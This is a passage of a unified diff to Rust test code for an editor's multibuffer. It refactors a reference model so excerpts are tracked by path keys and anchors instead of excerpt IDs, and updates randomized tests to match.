Vec, diffs: HashMap>, inverted_diffs: HashMap, Entity)>, + expanded_diff_hunks_by_buffer: HashMap>, } -#[derive(Debug)] +#[derive(Clone, Debug)] struct ReferenceExcerpt { - id: ExcerptId, + path_key: PathKey, + path_key_index: PathKeyIndex, buffer: Entity, range: Range, - expanded_diff_hunks: Vec, } -#[derive(Debug)] +#[derive(Clone, Debug)] struct ReferenceRegion { buffer_id: Option, range: Range, - buffer_range: Option>, + buffer_range: Range, + // if this is a deleted hunk, the main buffer anchor to which the deleted content is attached + deleted_hunk_anchor: Option, status: Option, - excerpt_id: Option, + excerpt: Option, } impl ReferenceMultibuffer { - fn expand_excerpts(&mut self, excerpts: &HashSet, line_count: u32, cx: &App) { - if line_count == 0 { + fn expand_excerpts( + &mut self, + excerpts: &HashSet>, + line_count: u32, + cx: &mut App, + ) { + use text::AnchorRangeExt as _; + + if line_count == 0 || excerpts.is_empty() { return; } - for id in excerpts { - let excerpt = self.excerpts.iter_mut().find(|e| e.id == *id).unwrap(); - let snapshot = excerpt.buffer.read(cx).snapshot(); - let mut point_range = excerpt.range.to_point(&snapshot); - point_range.start = Point::new(point_range.start.row.saturating_sub(line_count), 0); - point_range.end = - snapshot.clip_point(Point::new(point_range.end.row + line_count, 0), Bias::Left); - point_range.end.column = snapshot.line_len(point_range.end.row); - excerpt.range = - snapshot.anchor_before(point_range.start)..snapshot.anchor_after(point_range.end); + let mut excerpts_by_buffer: HashMap>> = + HashMap::default(); + for excerpt in excerpts { + excerpts_by_buffer + .entry(excerpt.context.start.buffer_id) + .or_default() + .push(excerpt.clone()) } - } - fn remove_excerpt(&mut self, id: ExcerptId, cx: &App) { - let ix = self - .excerpts - .iter() - .position(|excerpt| excerpt.id == id) - .unwrap(); - let excerpt = self.excerpts.remove(ix); - let buffer = excerpt.buffer.read(cx); - let buffer_id = buffer.remote_id(); - log::info!( - "Removing excerpt {}: {:?}", - ix, - buffer - .text_for_range(excerpt.range.to_offset(buffer)) - .collect::(), - ); - if !self - .excerpts - .iter() - .any(|excerpt| excerpt.buffer.read(cx).remote_id() == buffer_id) - { - self.diffs.remove(&buffer_id); - self.inverted_diffs.remove(&buffer_id); + for (buffer_id, excerpts_to_expand) in excerpts_by_buffer { + let mut buffer = None; + let mut buffer_snapshot = None; + let mut path = None; + let mut path_key_index = None; + let mut new_ranges = + self.excerpts + .iter() + .filter(|excerpt| excerpt.range.start.buffer_id == buffer_id) + .map(|excerpt| { + let snapshot = excerpt.buffer.read(cx).snapshot(); + let mut range = excerpt.range.to_point(&snapshot); + if excerpts_to_expand.iter().any(|info| { + excerpt.range.contains_anchor(info.context.start, &snapshot) + }) { + range.start = Point::new(range.start.row.saturating_sub(line_count), 0); + range.end = snapshot + .clip_point(Point::new(range.end.row + line_count, 0), Bias::Left); + range.end.column = snapshot.line_len(range.end.row); + } + buffer = Some(excerpt.buffer.clone()); + buffer_snapshot = Some(snapshot); + path = Some(excerpt.path_key.clone()); + path_key_index = Some(excerpt.path_key_index); + ExcerptRange::new(range) + }) + .collect::>(); + + new_ranges.sort_by(|l, r| l.context.start.cmp(&r.context.start)); + + self.set_excerpts( + path.unwrap(), + path_key_index.unwrap(), + buffer.unwrap(), + &buffer_snapshot.unwrap(), + new_ranges, + cx, + ); } } - fn insert_excerpt_after( + fn set_excerpts( &mut self, - prev_id: ExcerptId, - new_excerpt_id: ExcerptId, - (buffer_handle, anchor_range): (Entity, Range), + path_key: PathKey, + path_key_index: PathKeyIndex, + buffer: Entity, + buffer_snapshot: &BufferSnapshot, + ranges: Vec>, + cx: &mut App, ) { - let excerpt_ix = if prev_id == ExcerptId::max() { - self.excerpts.len() - } else { - self.excerpts - .iter() - .position(|excerpt| excerpt.id == prev_id) - .unwrap() - + 1 - }; - self.excerpts.insert( - excerpt_ix, - ReferenceExcerpt { - id: new_excerpt_id, - buffer: buffer_handle, - range: anchor_range, - expanded_diff_hunks: Vec::new(), - }, + self.excerpts.retain(|excerpt| { + excerpt.path_key != path_key && excerpt.buffer.entity_id() != buffer.entity_id() + }); + + let ranges = MultiBuffer::merge_excerpt_ranges(&ranges); + + let (Ok(ix) | Err(ix)) = self + .excerpts + .binary_search_by(|probe| probe.path_key.cmp(&path_key)); + self.excerpts.splice( + ix..ix, + ranges.into_iter().map(|range| ReferenceExcerpt { + path_key: path_key.clone(), + path_key_index, + buffer: buffer.clone(), + range: buffer_snapshot.anchor_before(range.context.start) + ..buffer_snapshot.anchor_after(range.context.end), + }), ); + self.update_expanded_diff_hunks_for_buffer(buffer_snapshot.remote_id(), cx); } - fn expand_diff_hunks(&mut self, excerpt_id: ExcerptId, range: Range, cx: &App) { + fn expand_diff_hunks(&mut self, path_key: PathKey, range: Range, cx: &App) { let excerpt = self .excerpts .iter_mut() - .find(|e| e.id == excerpt_id) + .find(|e| { + e.path_key == path_key + && e.range + .start + .cmp(&range.start, &e.buffer.read(cx).snapshot()) + .is_le() + && e.range + .end + .cmp(&range.end, &e.buffer.read(cx).snapshot()) + .is_ge() + }) .unwrap(); let buffer = excerpt.buffer.read(cx).snapshot(); let buffer_id = buffer.remote_id(); @@ -2503,36 +3026,47 @@ impl ReferenceMultibuffer { let Some(diff) = self.diffs.get(&buffer_id) else { return; }; - let excerpt_range = excerpt.range.to_offset(&buffer); + let excerpt_range = excerpt.range.to_point(&buffer); + let expanded_diff_hunks = self + .expanded_diff_hunks_by_buffer + .entry(buffer_id) + .or_default(); for hunk in diff .read(cx) .snapshot(cx) .hunks_intersecting_range(range, &buffer) { - let hunk_range = hunk.buffer_range.to_offset(&buffer); + let hunk_range = hunk.buffer_range.to_point(&buffer); if hunk_range.start < excerpt_range.start || hunk_range.start > excerpt_range.end { continue; } - if let Err(ix) = excerpt - .expanded_diff_hunks + if let Err(ix) = expanded_diff_hunks .binary_search_by(|anchor| anchor.cmp(&hunk.buffer_range.start, &buffer)) { log::info!( - "expanding diff hunk {:?}. excerpt:{:?}, excerpt range:{:?}", + "expanding diff hunk {:?}. excerpt range: {:?}, buffer {:?}", hunk_range, - excerpt_id, - excerpt_range + excerpt_range, + buffer.remote_id() ); - excerpt - .expanded_diff_hunks - .insert(ix, hunk.buffer_range.start); + expanded_diff_hunks.insert(ix, hunk.buffer_range.start); } else { - log::trace!("hunk {hunk_range:?} already expanded in excerpt {excerpt_id:?}"); + log::trace!("hunk {hunk_range:?} already expanded in excerpt"); } } } - fn expected_content(&self, cx: &App) -> (String, Vec, HashSet) { + fn expected_content( + &self, + cx: &App, + ) -> ( + String, + Vec, + HashSet, + Vec, + ) { + use util::maybe; + let mut text = String::new(); let mut regions = Vec::::new(); let mut excerpt_boundary_rows = HashSet::default(); @@ -2568,11 +3102,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(buffer_id), range: len..text.len(), - buffer_range: Some( - (offset..hunk_base_range.start).to_point(&buffer), - ), + buffer_range: (offset..hunk_base_range.start).to_point(&buffer), status: None, - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }); } } @@ -2584,9 +3117,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(buffer_id), range: len..text.len(), - buffer_range: Some(hunk_base_range.to_point(&buffer)), + buffer_range: hunk_base_range.to_point(&buffer), status: Some(DiffHunkStatus::deleted(hunk.secondary_status)), - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }); } @@ -2600,9 +3134,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(buffer_id), range: len..text.len(), - buffer_range: Some((offset..buffer_range.end).to_point(&buffer)), + buffer_range: (offset..buffer_range.end).to_point(&buffer), status: None, - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }); } else { let diff = self.diffs.get(&buffer_id).unwrap().read(cx).snapshot(cx); @@ -2624,10 +3159,18 @@ impl ReferenceMultibuffer { continue; } - if !excerpt.expanded_diff_hunks.iter().any(|expanded_anchor| { - expanded_anchor.to_offset(buffer).max(buffer_range.start) - == hunk_range.start.max(buffer_range.start) - }) { + if !self + .expanded_diff_hunks_by_buffer + .get(&buffer_id) + .cloned() + .into_iter() + .flatten() + .any(|expanded_anchor| { + expanded_anchor + .cmp(&hunk.buffer_range.start, buffer) + .is_eq() + }) + { log::trace!("skipping a hunk that's not marked as expanded"); continue; } @@ -2645,9 +3188,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(buffer_id), range: len..text.len(), - buffer_range: Some((offset..hunk_range.start).to_point(&buffer)), + buffer_range: (offset..hunk_range.start).to_point(&buffer), status: None, - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }); } @@ -2664,11 +3208,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(base_buffer.remote_id()), range: len..text.len(), - buffer_range: Some( - hunk.diff_base_byte_range.to_point(&base_buffer), - ), + buffer_range: hunk.diff_base_byte_range.to_point(&base_buffer), status: Some(DiffHunkStatus::deleted(hunk.secondary_status)), - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: Some(hunk.buffer_range.start), }); } @@ -2683,9 +3226,10 @@ impl ReferenceMultibuffer { let region = ReferenceRegion { buffer_id: Some(buffer_id), range, - buffer_range: Some((offset..hunk_range.end).to_point(&buffer)), + buffer_range: (offset..hunk_range.end).to_point(&buffer), status: Some(DiffHunkStatus::added(hunk.secondary_status)), - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }; offset = hunk_range.end; regions.push(region); @@ -2699,9 +3243,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(buffer_id), range: len..text.len(), - buffer_range: Some((offset..buffer_range.end).to_point(&buffer)), + buffer_range: (offset..buffer_range.end).to_point(&buffer), status: None, - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }); } } @@ -2711,12 +3256,16 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: None, range: 0..1, - buffer_range: Some(Point::new(0, 0)..Point::new(0, 1)), + buffer_range: Point::new(0, 0)..Point::new(0, 1), status: None, - excerpt_id: None, + excerpt: None, + deleted_hunk_anchor: None, }); } else { text.pop(); + let region = regions.last_mut().unwrap(); + assert!(region.deleted_hunk_anchor.is_none()); + region.range.end -= 1; } // Retrieve the row info using the region that contains @@ -2727,37 +3276,38 @@ impl ReferenceMultibuffer { .map(|line| { let row_info = regions .iter() - .position(|region| region.range.contains(&ix)) + .rposition(|region| { + region.range.contains(&ix) || (ix == text.len() && ix == region.range.end) + }) .map_or(RowInfo::default(), |region_ix| { - let region = ®ions[region_ix]; - let buffer_row = region.buffer_range.as_ref().map(|buffer_range| { - buffer_range.start.row - + text[region.range.start..ix].matches('\n').count() as u32 - }); - let main_buffer = self - .excerpts - .iter() - .find(|e| e.id == region.excerpt_id.unwrap()) - .map(|e| e.buffer.clone()); + let region = regions[region_ix].clone(); + let buffer_row = region.buffer_range.start.row + + text[region.range.start..ix].matches('\n').count() as u32; + let main_buffer = region.excerpt.as_ref().map(|e| e.buffer.clone()); + let excerpt_range = region.excerpt.as_ref().map(|e| &e.range); let is_excerpt_start = region_ix == 0 - || ®ions[region_ix - 1].excerpt_id != ®ion.excerpt_id + || regions[region_ix - 1].excerpt.as_ref().map(|e| &e.range) + != excerpt_range || regions[region_ix - 1].range.is_empty(); let mut is_excerpt_end = region_ix == regions.len() - 1 - || ®ions[region_ix + 1].excerpt_id != ®ion.excerpt_id; + || regions[region_ix + 1].excerpt.as_ref().map(|e| &e.range) + != excerpt_range; let is_start = !text[region.range.start..ix].contains('\n'); + let is_last_region = region_ix == regions.len() - 1; let mut is_end = if region.range.end > text.len() { !text[ix..].contains('\n') } else { - text[ix..region.range.end.min(text.len())] + let remaining_newlines = text[ix..region.range.end.min(text.len())] .matches('\n') - .count() - == 1 + .count(); + remaining_newlines == if is_last_region { 0 } else { 1 } }; if region_ix < regions.len() - 1 && !text[ix..].contains("\n") && (region.status == Some(DiffHunkStatus::added_none()) || region.status.is_some_and(|s| s.is_deleted())) - && regions[region_ix + 1].excerpt_id == region.excerpt_id + && regions[region_ix + 1].excerpt.as_ref().map(|e| &e.range) + == excerpt_range && regions[region_ix + 1].range.start == text.len() { is_end = true; @@ -2767,7 +3317,6 @@ impl ReferenceMultibuffer { MultiBufferRow(text[..ix].matches('\n').count() as u32); let mut expand_direction = None; if let Some(buffer) = &main_buffer { - let buffer_row = buffer_row.unwrap(); let needs_expand_up = is_excerpt_start && is_start && buffer_row > 0; let needs_expand_down = is_excerpt_end && is_end @@ -2785,16 +3334,21 @@ impl ReferenceMultibuffer { RowInfo { buffer_id: region.buffer_id, diff_status: region.status, - buffer_row, + buffer_row: Some(buffer_row), wrapped_buffer_row: None, multibuffer_row: Some(multibuffer_row), - expand_info: expand_direction.zip(region.excerpt_id).map( - |(direction, excerpt_id)| ExpandInfo { + expand_info: maybe!({ + let direction = expand_direction?; + let excerpt = region.excerpt.as_ref()?; + Some(ExpandInfo { direction, - excerpt_id, - }, - ), + start_anchor: Anchor::in_buffer( + excerpt.path_key_index, + excerpt.range.start, + ), + }) + }), } }); ix += line.len() + 1; @@ -2802,61 +3356,159 @@ impl ReferenceMultibuffer { }) .collect(); - (text, row_infos, excerpt_boundary_rows) + (text, row_infos, excerpt_boundary_rows, regions) } - fn diffs_updated(&mut self, cx: &App) { - for excerpt in &mut self.excerpts { - let buffer = excerpt.buffer.read(cx).snapshot(); - let buffer_id = buffer.remote_id(); + fn diffs_updated(&mut self, cx: &mut App) { + let buffer_ids = self.diffs.keys().copied().collect::>(); + for buffer_id in buffer_ids { + self.update_expanded_diff_hunks_for_buffer(buffer_id, cx); + } + } - // Skip inverted diff excerpts - hunks are always expanded - if self.inverted_diffs.contains_key(&buffer_id) { - continue; - } + fn add_diff(&mut self, diff: Entity, cx: &mut App) { + let buffer_id = diff.read(cx).buffer_id; + self.diffs.insert(buffer_id, diff); + } - let excerpt_range = excerpt.range.to_offset(&buffer); - let Some(diff) = self.diffs.get(&buffer_id) else { - continue; - }; - let diff = diff.read(cx).snapshot(cx); - let mut hunks = diff.hunks_in_row_range(0..u32::MAX, &buffer).peekable(); - excerpt.expanded_diff_hunks.retain(|hunk_anchor| { - if !hunk_anchor.is_valid(&buffer) { + fn add_inverted_diff( + &mut self, + diff: Entity, + main_buffer: Entity, + cx: &App, + ) { + let base_text_buffer_id = diff.read(cx).base_text(cx).remote_id(); + self.inverted_diffs + .insert(base_text_buffer_id, (diff, main_buffer)); + } + + fn update_expanded_diff_hunks_for_buffer(&mut self, buffer_id: BufferId, cx: &mut App) { + let excerpts = self + .excerpts + .iter() + .filter(|excerpt| excerpt.buffer.read(cx).remote_id() == buffer_id) + .collect::>(); + let Some(buffer) = excerpts.first().map(|excerpt| excerpt.buffer.clone()) else { + self.expanded_diff_hunks_by_buffer.remove(&buffer_id); + return; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); + let Some(diff) = self.diffs.get(&buffer_id) else { + self.expanded_diff_hunks_by_buffer.remove(&buffer_id); + return; + }; + let diff = diff.read(cx).snapshot(cx); + let hunks = diff + .hunks_in_row_range(0..u32::MAX, &buffer_snapshot) + .collect::>(); + self.expanded_diff_hunks_by_buffer + .entry(buffer_id) + .or_default() + .retain(|hunk_anchor| { + if !hunk_anchor.is_valid(&buffer_snapshot) { return false; } - while let Some(hunk) = hunks.peek() { - match hunk.buffer_range.start.cmp(hunk_anchor, &buffer) { - cmp::Ordering::Less => { - hunks.next(); - } - cmp::Ordering::Equal => { - let hunk_range = hunk.buffer_range.to_offset(&buffer); - return hunk_range.end >= excerpt_range.start - && hunk_range.start <= excerpt_range.end; - } - cmp::Ordering::Greater => break, - } - } - false + + let Ok(ix) = hunks.binary_search_by(|hunk| { + hunk.buffer_range.start.cmp(hunk_anchor, &buffer_snapshot) + }) else { + return false; + }; + let hunk_range = hunks[ix].buffer_range.to_point(&buffer_snapshot); + excerpts.iter().any(|excerpt| { + let excerpt_range = excerpt.range.to_point(&buffer_snapshot); + hunk_range.start >= excerpt_range.start && hunk_range.start <= excerpt_range.end + }) }); - } } - fn add_diff(&mut self, diff: Entity, cx: &mut App) { - let buffer_id = diff.read(cx).buffer_id; - self.diffs.insert(buffer_id, diff); + fn anchor_to_offset(&self, anchor: &Anchor, cx: &App) -> Option { + if anchor.diff_base_anchor().is_some() { + panic!("reference multibuffer cannot yet resolve anchors inside deleted hunks"); + } + let (anchor, snapshot, path_key) = self.anchor_to_buffer_anchor(anchor, cx)?; + // TODO(cole) can maybe make this and expected content call a common function instead + let (text, _, _, regions) = self.expected_content(cx); + + // Locate the first region that contains or is past the putative location of the buffer anchor + let ix = regions.partition_point(|region| { + let excerpt = region + .excerpt + .as_ref() + .expect("should have no buffers in empty reference multibuffer"); + excerpt + .path_key + .cmp(&path_key) + .then_with(|| { + if excerpt.range.end.cmp(&anchor, &snapshot).is_lt() { + Ordering::Less + } else if excerpt.range.start.cmp(&anchor, &snapshot).is_gt() { + Ordering::Greater + } else { + Ordering::Equal + } + }) + .then_with(|| { + if let Some(deleted_hunk_anchor) = region.deleted_hunk_anchor { + deleted_hunk_anchor.cmp(&anchor, &snapshot) + } else { + let point = anchor.to_point(&snapshot); + assert_eq!(region.buffer_id, Some(snapshot.remote_id())); + if region.buffer_range.end < point { + Ordering::Less + } else if region.buffer_range.start > point { + Ordering::Greater + } else { + Ordering::Equal + } + } + }) + .is_lt() + }); + + let Some(region) = regions.get(ix) else { + return Some(MultiBufferOffset(text.len())); + }; + + let offset = if region.buffer_id == Some(snapshot.remote_id()) { + let buffer_offset = anchor.to_offset(&snapshot); + let buffer_range = region.buffer_range.to_offset(&snapshot); + assert!(buffer_offset <= buffer_range.end); + let overshoot = buffer_offset.saturating_sub(buffer_range.start); + region.range.start + overshoot + } else { + region.range.start + }; + Some(MultiBufferOffset(offset)) } - fn add_inverted_diff( - &mut self, - diff: Entity, - main_buffer: Entity, + fn anchor_to_buffer_anchor( + &self, + anchor: &Anchor, cx: &App, - ) { - let base_text_buffer_id = diff.read(cx).base_text(cx).remote_id(); - self.inverted_diffs - .insert(base_text_buffer_id, (diff, main_buffer)); + ) -> Option<(text::Anchor, BufferSnapshot, PathKey)> { + let (excerpt, anchor) = match anchor { + Anchor::Min => { + let excerpt = self.excerpts.first()?; + (excerpt, excerpt.range.start) + } + Anchor::Excerpt(excerpt_anchor) => ( + self.excerpts.iter().find(|excerpt| { + excerpt.buffer.read(cx).remote_id() == excerpt_anchor.buffer_id() + })?, + excerpt_anchor.text_anchor, + ), + Anchor::Max => { + let excerpt = self.excerpts.last()?; + (excerpt, excerpt.range.end) + } + }; + + Some(( + anchor, + excerpt.buffer.read(cx).snapshot(), + excerpt.path_key.clone(), + )) } } @@ -2890,7 +3542,7 @@ async fn test_random_set_ranges(cx: &mut TestAppContext, mut rng: StdRng) { .collect::>(); ranges.sort_by_key(|range| range.start); log::info!("Setting ranges: {:?}", row_ranges(&ranges)); - let (created, _) = multibuffer.update(cx, |multibuffer, cx| { + multibuffer.update(cx, |multibuffer, cx| { multibuffer.set_excerpts_for_path( PathKey::for_buffer(&buf, cx), buf.clone(), @@ -2900,15 +3552,16 @@ async fn test_random_set_ranges(cx: &mut TestAppContext, mut rng: StdRng) { ) }); - assert_eq!(created.len(), ranges.len()); - let snapshot = multibuffer.update(cx, |multibuffer, cx| multibuffer.snapshot(cx)); let mut last_end = None; let mut seen_ranges = Vec::default(); - for (_, buf, range) in snapshot.excerpts() { - let start = range.context.start.to_point(buf); - let end = range.context.end.to_point(buf); + for info in snapshot.excerpts() { + let buffer_snapshot = snapshot + .buffer_for_id(info.context.start.buffer_id) + .unwrap(); + let start = info.context.start.to_point(buffer_snapshot); + let end = info.context.end.to_point(buffer_snapshot); seen_ranges.push(start..end); if let Some(last_end) = last_end.take() { @@ -2960,23 +3613,32 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { }); cx.update(|cx| reference.diffs_updated(cx)); } - 15..=19 if !reference.excerpts.is_empty() => { + 15..=24 if !reference.excerpts.is_empty() => { multibuffer.update(cx, |multibuffer, cx| { - let ids = multibuffer.excerpt_ids(); + let snapshot = multibuffer.snapshot(cx); + let infos = snapshot.excerpts().collect::>(); let mut excerpts = HashSet::default(); - for _ in 0..rng.random_range(0..ids.len()) { - excerpts.extend(ids.choose(&mut rng).copied()); + for _ in 0..rng.random_range(0..infos.len()) { + excerpts.extend(infos.choose(&mut rng).cloned()); } let line_count = rng.random_range(0..5); let excerpt_ixs = excerpts .iter() - .map(|id| reference.excerpts.iter().position(|e| e.id == *id).unwrap()) + .map(|info| { + reference + .excerpts + .iter() + .position(|e| e.range == info.context) + .unwrap() + }) .collect::>(); log::info!("Expanding excerpts {excerpt_ixs:?} by {line_count} lines"); multibuffer.expand_excerpts( - excerpts.iter().cloned(), + excerpts + .iter() + .map(|info| snapshot.anchor_in_excerpt(info.context.end).unwrap()), line_count, ExpandExcerptDirection::UpAndDown, cx, @@ -2985,25 +3647,7 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { reference.expand_excerpts(&excerpts, line_count, cx); }); } - 20..=29 if !reference.excerpts.is_empty() => { - let mut ids_to_remove = vec![]; - for _ in 0..rng.random_range(1..=3) { - let Some(excerpt) = reference.excerpts.choose(&mut rng) else { - break; - }; - let id = excerpt.id; - cx.update(|cx| reference.remove_excerpt(id, cx)); - ids_to_remove.push(id); - } - let snapshot = - multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); - ids_to_remove.sort_unstable_by(|a, b| a.cmp(b, &snapshot)); - drop(snapshot); - multibuffer.update(cx, |multibuffer, cx| { - multibuffer.remove_excerpts(ids_to_remove, cx) - }); - } - 30..=39 if !reference.excerpts.is_empty() => { + 25..=34 if !reference.excerpts.is_empty() => { let multibuffer = multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); let offset = multibuffer.clip_offset( @@ -3019,32 +3663,7 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { anchors.push(multibuffer.anchor_at(offset, bias)); anchors.sort_by(|a, b| a.cmp(b, &multibuffer)); } - 40..=44 if !anchors.is_empty() => { - let multibuffer = - multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); - let prev_len = anchors.len(); - anchors = multibuffer - .refresh_anchors(&anchors) - .into_iter() - .map(|a| a.1) - .collect(); - - // Ensure the newly-refreshed anchors point to a valid excerpt and don't - // overshoot its boundaries. - assert_eq!(anchors.len(), prev_len); - for anchor in &anchors { - if anchor.excerpt_id == ExcerptId::min() - || anchor.excerpt_id == ExcerptId::max() - { - continue; - } - - let excerpt = multibuffer.excerpt(anchor.excerpt_id).unwrap(); - assert_eq!(excerpt.id, anchor.excerpt_id); - assert!(excerpt.contains(anchor)); - } - } - 45..=55 if !reference.excerpts.is_empty() => { + 35..=45 if !reference.excerpts.is_empty() => { multibuffer.update(cx, |multibuffer, cx| { let snapshot = multibuffer.snapshot(cx); let excerpt_ix = rng.random_range(0..reference.excerpts.len()); @@ -3058,20 +3677,19 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { let start = excerpt.range.start; let end = excerpt.range.end; - let range = snapshot.anchor_in_excerpt(excerpt.id, start).unwrap() - ..snapshot.anchor_in_excerpt(excerpt.id, end).unwrap(); + let range = snapshot.anchor_in_excerpt(start).unwrap() + ..snapshot.anchor_in_excerpt(end).unwrap(); log::info!( - "expanding diff hunks in range {:?} (excerpt id {:?}, index {excerpt_ix:?}, buffer id {:?})", - range.to_offset(&snapshot), - excerpt.id, + "expanding diff hunks in range {:?} (excerpt index {excerpt_ix:?}, buffer id {:?})", + range.to_point(&snapshot), buffer_id, ); - reference.expand_diff_hunks(excerpt.id, start..end, cx); + reference.expand_diff_hunks(excerpt.path_key.clone(), start..end, cx); multibuffer.expand_diff_hunks(vec![range], cx); }); } - 56..=85 if needs_diff_calculation => { + 46..=75 if needs_diff_calculation => { multibuffer.update(cx, |multibuffer, cx| { for buffer in multibuffer.all_buffers() { let snapshot = buffer.read(cx).snapshot(); @@ -3102,13 +3720,6 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { // Decide if we're creating a new buffer or reusing an existing one let create_new_buffer = buffers.is_empty() || rng.random_bool(0.4); - let prev_excerpt_ix = rng.random_range(0..=reference.excerpts.len()); - let prev_excerpt_id = reference - .excerpts - .get(prev_excerpt_ix) - .map_or(ExcerptId::max(), |e| e.id); - let excerpt_ix = (prev_excerpt_ix + 1).min(reference.excerpts.len()); - let (excerpt_buffer, diff, inverted_main_buffer) = if create_new_buffer { let create_inverted = rng.random_bool(0.3); @@ -3186,43 +3797,45 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { } }; - let (range, anchor_range) = excerpt_buffer.read_with(cx, |buffer, _| { - let end_row = rng.random_range(0..=buffer.max_point().row); - let start_row = rng.random_range(0..=end_row); - let end_ix = buffer.point_to_offset(Point::new(end_row, 0)); - let start_ix = buffer.point_to_offset(Point::new(start_row, 0)); - let anchor_range = buffer.anchor_before(start_ix)..buffer.anchor_after(end_ix); - - log::info!( - "Inserting excerpt at {} of {} for buffer {}: {:?}[{:?}] = {:?}", - excerpt_ix, - reference.excerpts.len(), - buffer.remote_id(), - buffer.text(), - start_ix..end_ix, - &buffer.text()[start_ix..end_ix] - ); - - (start_ix..end_ix, anchor_range) + let excerpt_buffer_snapshot = + excerpt_buffer.read_with(cx, |excerpt_buffer, _| excerpt_buffer.snapshot()); + let mut ranges = reference + .excerpts + .iter() + .filter(|excerpt| excerpt.buffer == excerpt_buffer) + .map(|excerpt| excerpt.range.to_point(&excerpt_buffer_snapshot)) + .collect::>(); + mutate_excerpt_ranges(&mut rng, &mut ranges, &excerpt_buffer_snapshot, 1); + let ranges = ranges + .iter() + .cloned() + .map(ExcerptRange::new) + .collect::>(); + let path = cx.update(|cx| PathKey::for_buffer(&excerpt_buffer, cx)); + let path_key_index = multibuffer.update(cx, |multibuffer, _| { + multibuffer.get_or_create_path_key_index(&path) }); - let excerpt_id = multibuffer.update(cx, |multibuffer, cx| { - multibuffer - .insert_excerpts_after( - prev_excerpt_id, - excerpt_buffer.clone(), - [ExcerptRange::new(range.clone())], - cx, - ) - .pop() - .unwrap() + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpt_ranges_for_path( + path.clone(), + excerpt_buffer.clone(), + &excerpt_buffer_snapshot, + ranges.clone(), + cx, + ) }); - reference.insert_excerpt_after( - prev_excerpt_id, - excerpt_id, - (excerpt_buffer.clone(), anchor_range), - ); + cx.update(|cx| { + reference.set_excerpts( + path, + path_key_index, + excerpt_buffer.clone(), + &excerpt_buffer_snapshot, + ranges, + cx, + ) + }); let excerpt_buffer_id = excerpt_buffer.read_with(cx, |buffer, _| buffer.remote_id()); @@ -3256,6 +3869,39 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { } } +fn mutate_excerpt_ranges( + rng: &mut StdRng, + existing_ranges: &mut Vec>, + buffer: &BufferSnapshot, + operations: u32, +) { + let mut ranges_to_add = Vec::new(); + + for _ in 0..operations { + match rng.random_range(0..5) { + 0..=1 if !existing_ranges.is_empty() => { + let index = rng.random_range(0..existing_ranges.len()); + log::info!("Removing excerpt at index {index}"); + existing_ranges.remove(index); + } + _ => { + let end_row = rng.random_range(0..=buffer.max_point().row); + let start_row = rng.random_range(0..=end_row); + let end_col = buffer.line_len(end_row); + log::info!( + "Inserting excerpt for buffer {:?}, row range {:?}", + buffer.remote_id(), + start_row..end_row + ); + ranges_to_add.push(Point::new(start_row, 0)..Point::new(end_row, end_col)); + } + } + } + + existing_ranges.extend(ranges_to_add); + existing_ranges.sort_by(|l, r| l.start.cmp(&r.start)); +} + fn check_multibuffer( multibuffer: &MultiBuffer, reference: &ReferenceMultibuffer, @@ -3271,8 +3917,36 @@ fn check_multibuffer( .collect::>(); let actual_row_infos = snapshot.row_infos(MultiBufferRow(0)).collect::>(); - let (expected_text, expected_row_infos, expected_boundary_rows) = + let anchors_to_check = anchors + .iter() + .filter_map(|anchor| { + snapshot + .anchor_to_buffer_anchor(*anchor) + .map(|(anchor, _)| anchor) + }) + // Intentionally mix in some anchors that are (in general) not contained in any excerpt + .chain( + reference + .excerpts + .iter() + .map(|excerpt| excerpt.buffer.read(cx).remote_id()) + .dedup() + .flat_map(|buffer_id| { + [ + text::Anchor::min_for_buffer(buffer_id), + text::Anchor::max_for_buffer(buffer_id), + ] + }), + ) + .map(|anchor| snapshot.anchor_in_buffer(anchor).unwrap()) + .collect::>(); + + let (expected_text, expected_row_infos, expected_boundary_rows, _) = reference.expected_content(cx); + let expected_anchor_offsets = anchors_to_check + .iter() + .map(|anchor| reference.anchor_to_offset(anchor, cx).unwrap()) + .collect::>(); let has_diff = actual_row_infos .iter() @@ -3337,24 +4011,15 @@ fn check_multibuffer( .unwrap() + 1 ); - let reference_ranges = reference - .excerpts - .iter() - .map(|excerpt| { - ( - excerpt.id, - excerpt.range.to_offset(&excerpt.buffer.read(cx).snapshot()), - ) - }) - .collect::>(); for i in 0..snapshot.len().0 { - let excerpt = snapshot + let (_, excerpt_range) = snapshot .excerpt_containing(MultiBufferOffset(i)..MultiBufferOffset(i)) .unwrap(); - assert_eq!( - excerpt.buffer_range().start.0..excerpt.buffer_range().end.0, - reference_ranges[&excerpt.id()] - ); + reference + .excerpts + 